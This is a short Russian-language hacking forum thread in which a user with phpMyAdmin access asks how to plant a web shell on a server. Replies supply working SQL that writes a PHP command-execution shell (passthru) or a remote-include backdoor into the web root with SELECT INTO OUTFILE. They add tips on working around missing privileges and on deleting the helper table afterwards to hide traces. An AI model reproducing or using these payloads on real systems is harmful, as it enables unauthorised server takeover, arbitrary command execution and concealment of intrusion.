Вообщем столкнулся с такой проблемой. Есть доступ к phpmyadmin но не знаю как залить шелл. Может кто подскажет??
CREATE TABLE `shell` (s TEXT); INSERT INTO `shell` values ('<? passthru("$cmd"); ?>'); SELECT `s` INTO OUTFILE '/svoi/puti/k/saity/shell.php' FROM `shell`; DROP TABLE `shell`;
Смотря на что прав не хватает, добавить строку можно к любой другой таблице. Только удалить ее не забудь потом. А если на инто аутфайл или запись, то хуже уже...
SanyaX, Попробуй вот здесьпосмотреть: http://www.ljplus.ru/img/_/c/_cybermind_/_1.jpg http://www.ljplus.ru/img/_/c/_cybermind_/__1.jpg http://www.ljplus.ru/img/_/c/_cybermind_/_2.jpg http://www.ljplus.ru/img/_/c/_cybermind_/_3.jpg Вроде бы было что-то про дыры в пхпмайадмин. Да и сама статья не плохая...
Может я тут не в тему, но всёравно подскажу... Сначало в phpMyAdmin надо куда-то вписать значение <? include($_GET[p]) ?> потом использовать команду SELECT pass INTO OUTFILE 'c:/appserv/www/appserv/user.php' FROM user WHERE login = 'shell' Думаю значение этого всего объяснять ненадо, вот только не помню как путь прописывать... /www/site/ или \www\site\
